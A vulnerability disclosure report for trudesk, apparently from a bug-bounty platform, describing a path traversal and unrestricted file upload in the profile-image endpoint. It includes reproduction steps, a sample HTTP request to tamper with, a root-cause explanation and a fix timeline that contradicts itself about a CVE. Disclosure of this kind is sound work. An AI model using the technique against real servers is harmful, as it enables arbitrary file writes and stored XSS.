Unrestricted File Upload and Path Traversal in upload image in polonel/trudesk


Reported on May 12th 2022


The uploadImage function in accountsController takes the destination path and the file extension from user-supplied input. An attacker can change the path and extension to upload a dangerous file anywhere on the server.

Proof of Concept

1. Log in
2. Upload a profile image
3. Capture the request and modify `username` and `filename`

```http
POST /accounts/uploadImage HTTP/1.1
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close

Content-Disposition: form-data; name="username"

Content-Disposition: form-data; name="_id"

Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg

<image content>
```



An authenticated user can upload a dangerous file anywhere on the server (for example, uploading a file with a .html extension leads to stored XSS).


This function passes object.username into path.join(), which leads to path traversal, and it takes the saved extension from path.extname(filename), which allows a file of a dangerous type to be written.

We are processing your report and will contact the polonel/trudesk team within 24 hours. (a year ago)
tienpa99 modified the report (a year ago)
tienpa99 modified the report (a year ago)
We have contacted a member of the polonel/trudesk team and are waiting to hear back (a year ago)
polonel/trudesk maintainer has acknowledged this report (a year ago)


Hi, I see you have read the report. Is it hard to understand, or is the PoC not working?

Chris assigned a CVE to this report (a year ago)
Chris validated this vulnerability (a year ago)
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7


This has been fixed in v1.2.2. I will update this report once it has been released.



Sure. Just update here, I will recheck this issue.

We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. (a year ago)
Chris marked this as fixed in 1.2.2 with commit d107f1 (a year ago)
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE
accounts.js#L485-L505 has been validated